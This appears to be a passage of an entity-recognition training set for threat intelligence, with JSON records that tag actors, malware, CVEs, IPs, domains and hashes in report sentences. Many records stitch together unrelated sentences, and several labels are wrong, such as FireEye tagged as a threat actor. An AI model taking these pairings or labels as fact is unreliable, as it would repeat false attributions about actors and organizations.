While they have been quiet since our June analysis , we observed an increase in the group ’s activities in December , with updates on the kits ’ capabilities reminiscent of their previous attacks . They claim to have compromised the company and are willing to help resolve the issue .", "spans": {"THREAT_ACTOR: TG-3390": [[75, 82]], "ORGANIZATION: CTU": [[125, 128]]}, "info": {"id": "cyberner_stix_train_004726", "source": "cyberner_stix_train"}} {"text": "was somewhat pared down compared to the Russian one . Researchers at Symantec suspect that Turla used the hijacked network to attack a Middle Eastern government . Moreover the C2 infrastructure evolved too , more .php files are available through the web hosting: /login.php /upload.php /download.php .", "spans": {"ORGANIZATION: Symantec": [[69, 77]], "ORGANIZATION: government": [[150, 160]], "TOOL: C2": [[176, 178]], "FILEPATH: .php": [[213, 217]], "FILEPATH: /login.php": [[263, 284]], "FILEPATH: /upload.php": [[285, 307]], "FILEPATH: /download.php": [[308, 332]]}, "info": {"id": "cyberner_stix_train_004727", "source": "cyberner_stix_train"}} {"text": "new_url : to change the URL of the C2 server in the app preference . We assess that APT34 works on behalf of the Iranian government based on infrastructure details that contain references to Iran , use of Iranian infrastructure , and targeting that aligns with nation-state interests . Based on the analysed sample , JhoneRAT targets Saudi Arabia , Iraq , Egypt , Libya , Algeria , Morocco , Tunisia , Oman , Yemen , Syria , UAE , Kuwait , Bahrain and Lebanon . 
We urge asset owners to review and implement the following recommendations to mitigate and detect this activity .", "spans": {"THREAT_ACTOR: APT34": [[84, 89]], "MALWARE: JhoneRAT": [[317, 325]], "ORGANIZATION: asset owners": [[470, 482]]}, "info": {"id": "cyberner_stix_train_004728", "source": "cyberner_stix_train"}} {"text": "Certificate Used The apps themselves pretended to be carrier assistance apps which instructed the user to “ keep the app installed on your device and stay under Wi-Fi coverage to be contacted by one of our operators ” . Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address . Observed Seedworm victims were located primarily in Pakistan and Turkey , but also in Russia , Saudi Arabia , Afghanistan , Jordan , and elsewhere .", "spans": {"ORGANIZATION: Symantec": [[220, 228]], "THREAT_ACTOR: Leafminer": [[255, 264]], "VULNERABILITY: Heartbleed vulnerability": [[281, 305]], "VULNERABILITY: CVE-2014-0160": [[308, 321]], "THREAT_ACTOR: Seedworm": [[374, 382]]}, "info": {"id": "cyberner_stix_train_004729", "source": "cyberner_stix_train"}} {"text": "Starting with 195.154.110.237 , the IP address which is hosting the command and control domain windowsnewupdates.com , we found that the host is on a dedicated server .", "spans": {"IP_ADDRESS: 195.154.110.237": [[14, 29]], "DOMAIN: windowsnewupdates.com": [[95, 116]]}, "info": {"id": "cyberner_stix_train_004730", "source": "cyberner_stix_train"}} {"text": "EVENTBOT THREAT ACTORS As a part of this investigation , the Cybereason Nocturnus team has attempted to identify the threat actors behind the development of EventBot . This full-blown spying framework consists of two packages named ‘Tokyo’ and ‘Yokohama’ . 
After learning of an active attack incident from the Rocket Kitten group on a customer network , Check Point researchers decided to actively join the investigation .", "spans": {"MALWARE: EVENTBOT": [[0, 8]], "ORGANIZATION: Cybereason Nocturnus": [[61, 81]], "MALWARE: EventBot": [[157, 165]], "MALWARE: ‘Tokyo’": [[232, 239]], "MALWARE: ‘Yokohama’": [[244, 254]], "THREAT_ACTOR: Rocket Kitten group": [[310, 329]], "ORGANIZATION: Check Point": [[354, 365]]}, "info": {"id": "cyberner_stix_train_004731", "source": "cyberner_stix_train"}} {"text": "Care and concern both for using a mobile device and for securing a mobile device is critical , especially for those organizations that allow bring-your-own-devices . As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . APT10 primarily used PlugX malware from 2014 to 2016 , progressively improving and deploying newer versions , while simultaneously standardising their command and control function .", "spans": {"MALWARE: malicious documents": [[195, 214]], "VULNERABILITY: CVE-2017-0199": [[226, 239]], "TOOL: LATENTBOT malware": [[265, 282]], "THREAT_ACTOR: APT10": [[285, 290]], "MALWARE: PlugX": [[306, 311]], "MALWARE: malware": [[312, 319]]}, "info": {"id": "cyberner_stix_train_004732", "source": "cyberner_stix_train"}} {"text": "The company uses a type of software from Adups that 's nicknamed FOTA , short for firmware over-the-air . Rapid7 then provided a breach notification to Visma to alert them to this compromise in September 2018 . Invader : 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb . 9002 S-MAL:933d66b43b3ce9a572ee3127b255b4baf69d6fdd7cb24da609b52ee277baa76e . 9002 S-MAL:2bec20540d200758a223a7e8f7b2f98cd4949e106c1907d3f194216208c5b2fe . 
9002 S-MAL:055fe8002de293401852310ae76cb730c570f2037c3c832a52a79b70e2cb7831 .", "spans": {"ORGANIZATION: Adups": [[41, 46]], "SYSTEM: FOTA": [[65, 69]], "ORGANIZATION: Rapid7": [[106, 112]], "MALWARE: Invader": [[211, 218]], "FILEPATH: 57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb": [[221, 285]], "FILEPATH: 9002 S-MAL:933d66b43b3ce9a572ee3127b255b4baf69d6fdd7cb24da609b52ee277baa76e": [[288, 363]], "FILEPATH: 9002 S-MAL:2bec20540d200758a223a7e8f7b2f98cd4949e106c1907d3f194216208c5b2fe": [[366, 441]], "FILEPATH: 9002 S-MAL:055fe8002de293401852310ae76cb730c570f2037c3c832a52a79b70e2cb7831": [[444, 519]]}, "info": {"id": "cyberner_stix_train_004733", "source": "cyberner_stix_train"}} {"text": "Mobile implant evolution timeline However , some facts indicate that the APK samples from stage two can also be used separately as the first step of the infection . These APT attacks and adopting confrontation measures will exist for a long time . Though both this group and Winnti Group use the malware Winnti , the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting .", "spans": {"THREAT_ACTOR: APT": [[171, 174]], "ORGANIZATION: adopting confrontation measures": [[187, 218]], "THREAT_ACTOR: Winnti": [[275, 281]], "MALWARE: Winnti": [[304, 310]]}, "info": {"id": "cyberner_stix_train_004734", "source": "cyberner_stix_train"}} {"text": "- SpyNote RAT was also collecting the device ’ s location to identify the exact location of the victim . As we described in Silence: Moving into the darkside report , Silence has experience with theft using compromised card processing systems . 
The Cobalt started its high-tech criminal activities in late 2013 by launching the Anunak malware campaign that targeted financial transfers and ATM networks of financial institutions around the world .", "spans": {"MALWARE: SpyNote RAT": [[2, 13]], "THREAT_ACTOR: Silence:": [[124, 132]], "THREAT_ACTOR: Silence": [[167, 174]], "THREAT_ACTOR: Cobalt": [[249, 255]], "ORGANIZATION: financial institutions": [[406, 428]]}, "info": {"id": "cyberner_stix_train_004735", "source": "cyberner_stix_train"}} {"text": "While it can be used anywhere and target any bank or region , at this time , we are seeing it deployed specifically in Germany . Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation .", "spans": {"VULNERABILITY: CVE-2017-11882": [[195, 209]], "MALWARE: 'NavShExt.dll'": [[276, 290]], "MALWARE: iexplore.exe": [[321, 333]], "THREAT_ACTOR: OilRig group": [[472, 484]], "MALWARE: QUADAGENT samples": [[494, 511]], "MALWARE: Invoke-Obfuscation": [[574, 592]]}, "info": {"id": "cyberner_stix_train_004736", "source": "cyberner_stix_train"}} {"text": "This means that the only thing possible in this case is to replace its DEX file . Our experts have found that cybercriminals are actively focusing on SMBs , and giving particular attention to accountants . Later , Windows Defender Antivirus was added to the checklist . 
In fact , this chain also leads to NetSupport RAT .", "spans": {"TOOL: SMBs": [[150, 154]], "ORGANIZATION: accountants": [[192, 203]], "TOOL: Windows Defender Antivirus": [[214, 240]], "TOOL: NetSupport RAT": [[305, 319]]}, "info": {"id": "cyberner_stix_train_004737", "source": "cyberner_stix_train"}} {"text": "So far , researchers have seen around 100 victims of Slingshot and its related modules , located in Kenya , Yemen , Afghanistan , Libya , Congo , Jordan , Turkey , Iraq , Sudan , Somalia and Tanzania . This focus on training aligns with LYCEUM’s targeting of executives , HR staff , and IT personnel .", "spans": {"TOOL: Slingshot": [[53, 62]], "THREAT_ACTOR: LYCEUM’s": [[237, 245]], "ORGANIZATION: executives": [[259, 269]], "ORGANIZATION: HR staff": [[272, 280]], "ORGANIZATION: IT personnel": [[287, 299]]}, "info": {"id": "cyberner_stix_train_004738", "source": "cyberner_stix_train"}} {"text": "This information can be used to facilitate future spam campaigns by the perpetrator or may be sold to other actors .", "spans": {}, "info": {"id": "cyberner_stix_train_004739", "source": "cyberner_stix_train"}} {"text": "However , this scenario is highly unlikely .", "spans": {}, "info": {"id": "cyberner_stix_train_004740", "source": "cyberner_stix_train"}} {"text": "Gaza Cybergang Group 3: This group is believed to be behind Operation Parliament .", "spans": {"THREAT_ACTOR: Gaza Cybergang": [[0, 14]]}, "info": {"id": "cyberner_stix_train_004741", "source": "cyberner_stix_train"}} {"text": "] net app store showing the current DroidVPN app Virtual Private Network ( VPN ) tools allow connections to remote private networks , increasing the security and privacy of the user ’ s communications . These campaign-related VPSs are located in South Africa . 
Since the release of the Arbor blog post , FireEye has observed APT12 use a modified backdoor that we call HIGHTIDE .", "spans": {"THREAT_ACTOR: VPSs": [[226, 230]], "ORGANIZATION: Arbor": [[286, 291]], "ORGANIZATION: FireEye": [[304, 311]], "THREAT_ACTOR: APT12": [[325, 330]], "MALWARE: HIGHTIDE": [[368, 376]]}, "info": {"id": "cyberner_stix_train_004742", "source": "cyberner_stix_train"}} {"text": "] com www5.zyns [ . APT41 sent spear-phishing emails to multiple HR employees three days after the compromise had been remediated and systems were brought back online . Firstly , as with the MiniDuke campaigns of February 2013 and CosmicDuke campaigns in the summer of 2014 , again the group clearly prioritized the continuation of their operations over maintaining stealth .", "spans": {"THREAT_ACTOR: APT41": [[20, 25]]}, "info": {"id": "cyberner_stix_train_004743", "source": "cyberner_stix_train"}} {"text": "SHA256 Package Name App Name First Seen 07994c9f2eeeede199dd6b4e760fce3 71f03f3cc4307e6551c18d2fbd024a24f com.android.henbox 备份 ( Backup ) January 3rd 2018 Table 6 contains an updated list of targeted apps from which this newer variant of HenBox is capable of harvesting data . At least two of these malware families , HIGHNOON.CLI and GEARSHIFT , have been used by APT17 and another suspected Chinese espionage group . The Dukes are a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making .", "spans": {"MALWARE: HenBox": [[239, 245]], "TOOL: HIGHNOON.CLI": [[319, 331]], "TOOL: GEARSHIFT": [[336, 345]], "THREAT_ACTOR: APT17": [[366, 371]], "THREAT_ACTOR: group": [[412, 417]], "THREAT_ACTOR: Dukes": [[424, 429]]}, "info": {"id": "cyberner_stix_train_004744", "source": "cyberner_stix_train"}} {"text": "The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . 
Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents .", "spans": {"MALWARE: flare-qdb": [[18, 27]], "THREAT_ACTOR: Lazarus group": [[110, 123]], "TOOL: emails": [[173, 179]], "ORGANIZATION: job recruiters": [[194, 208]]}, "info": {"id": "cyberner_stix_train_004745", "source": "cyberner_stix_train"}} {"text": "The group did change the contents of the spear-phishing emails they sent , but they didn’t switch to a new email format ; instead , they reverted to the same efaxthemed format that they had previously employed , even to the point of reusing the exact same decoy document that they had used in the CozyDuke campaign a year earlier ( July 2014 ) .", "spans": {"TOOL: emails": [[56, 62]], "TOOL: email": [[107, 112]], "MALWARE: CozyDuke": [[297, 305]]}, "info": {"id": "cyberner_stix_train_004746", "source": "cyberner_stix_train"}} {"text": "While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions . One archive sample analyzed by CTU researchers contained a legitimate PDF file , a benign image of interest to targets ( see Figure 8 ) , and an HTTPBrowser installer disguised as an image file .", "spans": {"ORGANIZATION: SOC personnel": [[36, 49]], "ORGANIZATION: CTU": [[303, 306]], "MALWARE: PDF file": [[342, 350]], "MALWARE: HTTPBrowser installer": [[417, 438]]}, "info": {"id": "cyberner_stix_train_004747", "source": "cyberner_stix_train"}} {"text": "Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b . 
Over the summer they compromised several sites , including a well-known Uyghur website written in that native language .", "spans": {"VULNERABILITY: Flash exploits": [[11, 25]], "VULNERABILITY: Java zero-day": [[95, 108]], "ORGANIZATION: Kaspersky Lab": [[168, 181]], "VULNERABILITY: Exploit.Java.CVE-2012-3213.b": [[194, 222]]}, "info": {"id": "cyberner_stix_train_004748", "source": "cyberner_stix_train"}} {"text": "In theory , Shun Wang Technologies could have collected a third of China’s population names and contact numbers if not more . ined in the archive is called DriverInstallerU.exe” but its metadata shows that its original name is Interenet Assistant.exe” .", "spans": {"THREAT_ACTOR: Shun Wang": [[12, 21]], "FILEPATH: DriverInstallerU.exe”": [[156, 177]], "FILEPATH: Interenet Assistant.exe”": [[227, 251]]}, "info": {"id": "cyberner_stix_train_004749", "source": "cyberner_stix_train"}} {"text": "Initial victim communication with the INDRIK SPIDER operator , using one of the email addresses provided , results in the operator providing key pieces of information up front , such as the BTC address and the ransom amount . We will publish more details about the attack once Adobe patches the vulnerability , which should be on June 16 .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[38, 51]]}, "info": {"id": "cyberner_stix_train_004750", "source": "cyberner_stix_train"}} {"text": "In recent years , some malicious Android applications abused these accessibility services in various attack scenarios . The members of the group use a variety of tools , including CCleaner , on a daily basis to effectively remove any evidence of their operations . 
The OilRig group continues to target organizations in the Middle East , in this instance targeting the government of the United Arab Emirates .", "spans": {"SYSTEM: Android": [[33, 40]], "THREAT_ACTOR: group": [[139, 144]], "TOOL: CCleaner": [[180, 188]], "THREAT_ACTOR: OilRig group": [[269, 281]], "ORGANIZATION: government": [[368, 378]]}, "info": {"id": "cyberner_stix_train_004751", "source": "cyberner_stix_train"}} {"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . Once the docx file included in the phishing email is clicked , a warning window will pop up .", "spans": {"MALWARE: Mimikatz": [[0, 8]]}, "info": {"id": "cyberner_stix_train_004752", "source": "cyberner_stix_train"}} {"text": "Conclusion Due to the ubiquitous nature of mobile devices and the widespread use of Android , it is very easy for attackers to victimize Android users . Today , this malware is still actively being used against the Philippines . APT18 : TG-0416 , Dynamite Panda , Threat Group-0416 .", "spans": {"SYSTEM: Android": [[84, 91], [137, 144]], "MALWARE: malware": [[166, 173]], "THREAT_ACTOR: APT18": [[229, 234]], "THREAT_ACTOR: TG-0416": [[237, 244]], "THREAT_ACTOR: Dynamite Panda": [[247, 261]], "THREAT_ACTOR: Threat Group-0416": [[264, 281]]}, "info": {"id": "cyberner_stix_train_004753", "source": "cyberner_stix_train"}} {"text": "The OceanLotus , an APT group said to have a Vietnamese background , was first exposed and named by QiAnXin in May 2015 . The DeepSight Managed Adversary and Threat Intelligence team co-authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug ( aka Turla ) Cyber Espionage group , and methods of detecting and thwarting activities of this adversary . 
The DeepSight MATI team authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug Cyber Espionage group , and methods of detecting and thwarting activities of this adversary . While reviewing a 2015 report⁵ of a Winnti intrusion at a Vietnamese gaming company , we identified a small cluster of Winnti⁶ samples designed specifically for Linux⁷ . Following these reports , Chronicle researchers doubled down on efforts to try to unravel the various campaigns where Winnti was leveraged . Distinct changes to Azazel by the Winnti developers include the addition of a function named ‘Decrypt2’ , which is used to decode an embedded configuration similar to the core implant . Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits . We will see more from Zebrocy into 2019 on government and military related organizations . The PowerShell script will look at the architecture of the system to check which malicious DLL files should be downloaded . In the same year , Silence conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans . \bThe FBI issued a rare bulletin admitting that a group named APT6 hacked into US government computer systems as far back as 2011 and for years stole sensitive data . \bFireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123 . \bTrend Micro attributes this activity to MuddyWater , an Iran-nexus actor that has been active since at least May 2017 . \bFireEye assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper . FireEye has observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks . 
On Nov14 , 2017 , FireEye observed APT34 using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . Kaspersky reveals that APT33 is a capable group that has carried out Cyber Espionage operations since at least 2013 . APT33 is the only group that Kaspersky has observed use the DROPSHOT dropper . The Cyber Espionage group APT32 heavily obfuscates their backdoors and scripts , and Mandiant consultants observed APT32 implement additional command argument obfuscation in April 2017 . In all Mandiant investigations to date where the CARBANAK backdoor has been discovered , the activity has been attributed to the FIN7 threat group . Kaspersky released a similar report about the same group under the name Carbanak in February 2015 . FireEye assesses that APT32 leverages a unique suite of fully-featured malware . FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam’s manufacturing , consumer products , and hospitality sectors . The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions . FireEye assesses that APT32 is a Cyber Espionage group aligned with Vietnamese government interests . In May and June 2017 , FireEye has associated this campaign with APT19 , a group that we assess is composed of freelancers , with some degree of sponsorship by the Chinese government . APT10 is a Chinese Cyber Espionage group that FireEye has tracked since 2009 . In addition to the spear phishes , FireEye ISIGHT Intelligence has observed APT10 accessing victims through global service providers . FireEye’s visibility into the operations of APT28 – a group we believe the Russian government sponsors – has given us insight into some of the government’s targets , as well as its objectives and the activities designed to further them . 
FireEye has tracked and profiled APT28 group through multiple investigations , endpoint and network detections , and continuous monitoring . In April 2015 , FireEye uncovered the malicious efforts of APT30 , a suspected China-based threat group . FireEye iSIGHT Intelligence has been tracking a pair of cybercriminals that we refer to as the Vendetta Brothers . Google and Microsoft have already confirmed the Russian hacker group APT28 used a Flash vulnerability CVE-2016-7855 along with this kernel privilege escalation flaw to perform a targeted attack .", "spans": {"THREAT_ACTOR: OceanLotus": [[4, 14]], "ORGANIZATION: QiAnXin": [[100, 107]], "ORGANIZATION: DeepSight Managed Adversary": [[126, 153]], "ORGANIZATION: Threat Intelligence": [[158, 177]], "THREAT_ACTOR: Waterbug": [[325, 333], [605, 613]], "THREAT_ACTOR: Turla": [[340, 345]], "ORGANIZATION: DeepSight MATI team": [[446, 465]], "THREAT_ACTOR: Winnti": [[744, 750], [996, 1002]], "ORGANIZATION: Vietnamese gaming company": [[766, 791]], "THREAT_ACTOR: Winnti⁶": [[827, 834]], "ORGANIZATION: Chronicle": [[904, 913]], "MALWARE: Azazel": [[1039, 1045]], "THREAT_ACTOR: Winnti developers": [[1053, 1070]], "THREAT_ACTOR: Zebrocy": [[1205, 1212], [1375, 1382]], "VULNERABILITY: 0day": [[1337, 1341]], "VULNERABILITY: exploits": [[1342, 1350]], "ORGANIZATION: government": [[1396, 1406], [3617, 3627]], "ORGANIZATION: military": [[1411, 1419]], "MALWARE: PowerShell script": [[1448, 1465]], "FILEPATH: malicious DLL files": [[1525, 1544]], "THREAT_ACTOR: Silence": [[1587, 1594]], "MALWARE: Perl IRC bot": [[1628, 1640]], "MALWARE: public IRC": [[1645, 1655]], "ORGANIZATION: FBI": [[1688, 1691]], "THREAT_ACTOR: APT6": [[1744, 1748]], "ORGANIZATION: US government": [[1761, 1774]], "ORGANIZATION: \bFireEye iSIGHT": [[1849, 1864]], "THREAT_ACTOR: APT37": [[1892, 1897]], "THREAT_ACTOR: Scarcruft": [[1948, 1957]], "THREAT_ACTOR: Group123": [[1962, 1970]], "ORGANIZATION: \bTrend Micro": [[1973, 1985]], "THREAT_ACTOR: MuddyWater": 
[[2014, 2024]], "THREAT_ACTOR: actor": [[2041, 2046]], "ORGANIZATION: \bFireEye": [[2094, 2102]], "THREAT_ACTOR: actors": [[2119, 2125]], "TOOL: Flash": [[2148, 2153], [4721, 4726]], "THREAT_ACTOR: TEMP.Reaper": [[2210, 2221]], "ORGANIZATION: FireEye": [[2224, 2231], [2371, 2378], [3140, 3147], [3221, 3228], [3381, 3388], [3538, 3545], [3663, 3670], [4277, 4284], [4434, 4441]], "THREAT_ACTOR: TEMP.Hermit": [[2296, 2307]], "THREAT_ACTOR: APT34": [[2388, 2393]], "VULNERABILITY: exploit": [[2403, 2410]], "ORGANIZATION: Microsoft": [[2419, 2428], [4650, 4659]], "VULNERABILITY: vulnerability": [[2436, 2449]], "ORGANIZATION: government organization": [[2462, 2485]], "ORGANIZATION: Kaspersky": [[2507, 2516], [2654, 2663], [3040, 3049]], "THREAT_ACTOR: APT33": [[2530, 2535], [2625, 2630]], "MALWARE: DROPSHOT dropper": [[2685, 2701]], "THREAT_ACTOR: APT32": [[2730, 2735], [2819, 2824], [3242, 3247], [3519, 3524], [3560, 3565]], "MALWARE: backdoors": [[2761, 2770]], "MALWARE: scripts": [[2775, 2782]], "ORGANIZATION: Mandiant": [[2898, 2906], [3492, 3500]], "THREAT_ACTOR: FIN7": [[3020, 3024]], "THREAT_ACTOR: Carbanak": [[3112, 3120]], "ORGANIZATION: Vietnam’s manufacturing": [[3305, 3328]], "ORGANIZATION: consumer products": [[3331, 3348]], "ORGANIZATION: hospitality": [[3355, 3366]], "ORGANIZATION: iSIGHT": [[3389, 3395]], "ORGANIZATION: Vietnamese": [[3606, 3616]], "THREAT_ACTOR: APT19": [[3705, 3710]], "ORGANIZATION: Chinese government": [[3804, 3822]], "THREAT_ACTOR: APT10": [[3825, 3830], [3980, 3985]], "THREAT_ACTOR: FireEye": [[3871, 3878]], "ORGANIZATION: FireEye ISIGHT Intelligence": [[3939, 3966]], "ORGANIZATION: FireEye’s": [[4039, 4048]], "THREAT_ACTOR: APT28": [[4083, 4088], [4310, 4315], [4708, 4713]], "ORGANIZATION: Russian government": [[4114, 4132]], "THREAT_ACTOR: APT30": [[4477, 4482]], "ORGANIZATION: FireEye iSIGHT": [[4524, 4538]], "THREAT_ACTOR: Vendetta Brothers": [[4619, 4636]], "ORGANIZATION: Google": [[4639, 4645]], "VULNERABILITY: CVE-2016-7855": 
[[4741, 4754]]}, "info": {"id": "cyberner_stix_train_004754", "source": "cyberner_stix_train"}} {"text": "FIN7 is a financially motivated intrusion set that selectively targets victims and uses spear phishing to distribute its malware . Microsoft Analytics shows that Winnti has been used in intrusions carried out throughout Asia , Europe , Oceania , the Middle East , and the United States in the last six months ( Figure 1 ) .", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]], "ORGANIZATION: financially": [[10, 21]], "ORGANIZATION: Microsoft Analytics": [[131, 150]], "MALWARE: Winnti": [[162, 168]]}, "info": {"id": "cyberner_stix_train_004755", "source": "cyberner_stix_train"}} {"text": "In some other cases , LEAD gains access to a target by brute-forcing remote access login credentials , performing SQL injection , or exploiting unpatched web servers , and then they copy the Winnti installer directly to compromised machines .", "spans": {"THREAT_ACTOR: LEAD": [[22, 26]], "TOOL: remote access login credentials": [[69, 100]], "TOOL: SQL injection": [[114, 127]], "TOOL: web servers": [[154, 165]], "MALWARE: Winnti": [[191, 197]]}, "info": {"id": "cyberner_stix_train_004756", "source": "cyberner_stix_train"}} {"text": "WAKE_LOCK - prevent the processor from sleeping and dimming the screen . Furthermore , it has similar code logic as previous ones wuaupdt.exe in this attack appears in previous Donot attack , and C2 addresses are same to previous ones . 
Our evidence suggests that malware authors created Emissary as early as 2009 , which suggests that threat actors have relied on this tool as a payload in cyber-espionage attacks for many years .", "spans": {"MALWARE: wuaupdt.exe": [[130, 141]], "MALWARE: Emissary": [[288, 296]], "THREAT_ACTOR: actors": [[343, 349]]}, "info": {"id": "cyberner_stix_train_004757", "source": "cyberner_stix_train"}} {"text": "One of India 's largest financial organizations A large e-commerce company The e-commerce company 's primary shipping vendor One of India 's top five IT firms A United States healthcare provider 's Indian business unit Two government organizations .", "spans": {}, "info": {"id": "cyberner_stix_train_004758", "source": "cyberner_stix_train"}} {"text": "] net – C & C servers NG SuperShell – string from the reverse shell payload ngg – prefix in commands names of the implant for Windows Signature with specific issuer Whois records and IP relationships provide many interesting insights as well . One is called XAgent detected as IOS_XAGENT.A and the other one uses the name of a legitimate iOS game , MadCap detected as IOS_ XAGENT.B . Once the LOWBALL malware calls back to the Dropbox account , the admin@338 will create a file called upload.bat which contains commands to be executed on the compromised computer .", "spans": {"SYSTEM: Windows": [[126, 133]], "MALWARE: XAgent": [[258, 264]], "MALWARE: IOS_XAGENT.A": [[277, 289]], "MALWARE: MadCap": [[349, 355]], "MALWARE: XAGENT.B": [[373, 381]], "MALWARE: LOWBALL": [[393, 400]], "MALWARE: malware": [[401, 408]], "TOOL: Dropbox": [[427, 434]], "THREAT_ACTOR: admin@338": [[449, 458]], "FILEPATH: upload.bat": [[485, 495]]}, "info": {"id": "cyberner_stix_train_004759", "source": "cyberner_stix_train"}} {"text": "The supposed purpose of that app is to obtain and use a required “ security code ” to log in to their online banking site . 
Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . However , the attack on January 16 did not involve ThreeDollars at all .", "spans": {"MALWARE: Mimikatz": [[124, 132]], "MALWARE: ThreeDollars": [[280, 292]]}, "info": {"id": "cyberner_stix_train_004760", "source": "cyberner_stix_train"}} {"text": "ESET researchers have dissected some of the latest additions to the malicious toolkit of the Advanced Persistent Threat (APT) group known as OceanLotus , also dubbed APT32 and APT-C-00 . Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "TOOL: malicious toolkit": [[68, 85]], "THREAT_ACTOR: OceanLotus": [[141, 151]], "THREAT_ACTOR: APT32": [[166, 171]], "THREAT_ACTOR: APT-C-00": [[176, 184]], "FILEPATH: CARBANAK": [[267, 275]]}, "info": {"id": "cyberner_stix_train_004761", "source": "cyberner_stix_train"}} {"text": "These events can be based on time , charging or battery status , location , connectivity , running apps , focused app , SIM card status , SMS received with keywords , and screen turning on . Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as OilRig and CopyKittens . 
Once the opaque predicates are broken , Sandworm was first observed in the victim ’s environment in June 2022 , when the actor deployed the Neo - REGEORG webshell on an internet - facing server .", "spans": {"THREAT_ACTOR: threat groups": [[403, 416]], "THREAT_ACTOR: OilRig": [[427, 433]], "THREAT_ACTOR: CopyKittens": [[438, 449]], "THREAT_ACTOR: Sandworm": [[492, 500]], "TOOL: Neo - REGEORG": [[592, 605]], "SYSTEM: internet - facing server": [[621, 645]]}, "info": {"id": "cyberner_stix_train_004762", "source": "cyberner_stix_train"}} {"text": "Today this malware shows unwanted ads , tomorrow it could steal sensitive information ; from private messages to banking credentials and much more . Considering the Trojan delivery method and through our analysis of infections on banks' networks , we can confirm that all infections were conducted on a random basis . By checking the sender information , it ’s possible to determine whether the company actually exists . Apple had to roll back and then re - release a security update that addressed an actively exploited vulnerability in WebKit .", "spans": {"ORGANIZATION: Apple": [[421, 426]], "VULNERABILITY: exploited vulnerability": [[511, 534]], "ORGANIZATION: WebKit": [[538, 544]]}, "info": {"id": "cyberner_stix_train_004763", "source": "cyberner_stix_train"}} {"text": "We suggest that APT41 sought to target in-game currency but found they could not monetize the specific targeted game , so the group resorted to ransomware to attempt to salvage their efforts and profit from the compromise . 
The techniques and modules employed by EvilGnome — that is the use of SFX , persistence with task scheduler and the deployment of information stealing tools—remind us of Gamaredon Group’s Windows tools .", "spans": {"THREAT_ACTOR: APT41": [[16, 21]], "THREAT_ACTOR: EvilGnome": [[263, 272]], "MALWARE: SFX": [[294, 297]], "FILEPATH: Windows tools": [[412, 425]]}, "info": {"id": "cyberner_stix_train_004764", "source": "cyberner_stix_train"}} {"text": "At that time , the actor used a fake website : wfcwallet.com .", "spans": {"DOMAIN: wfcwallet.com": [[47, 60]]}, "info": {"id": "cyberner_stix_train_004765", "source": "cyberner_stix_train"}} {"text": "Shifu is relatively common in Japan but was a new addition to TA505 ’s toolbox .", "spans": {"MALWARE: Shifu": [[0, 5]], "THREAT_ACTOR: TA505": [[62, 67]]}, "info": {"id": "cyberner_stix_train_004766", "source": "cyberner_stix_train"}} {"text": "This discovery indicates the actor ’ s ambition in expanding operations into Google Play store with previous success experience from the main “ Agent Smith ” campaign . The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio . RevengeHotels : cybercrime targeting hotel front desks worldwide . Say these arguments extend through the 2024 election — what happens if control of the White House or Congress switches between parties ?", "spans": {"SYSTEM: Google Play": [[77, 88]], "MALWARE: Agent Smith": [[144, 155]], "MALWARE: Android version": [[173, 188]], "THREAT_ACTOR: RevengeHotels": [[291, 304]]}, "info": {"id": "cyberner_stix_train_004767", "source": "cyberner_stix_train"}} {"text": "Dridex operations became more targeted , resulting in less distribution and Dridex sub-botnets in operation , and BitPaymer ransomware operations began in July 2017 . 
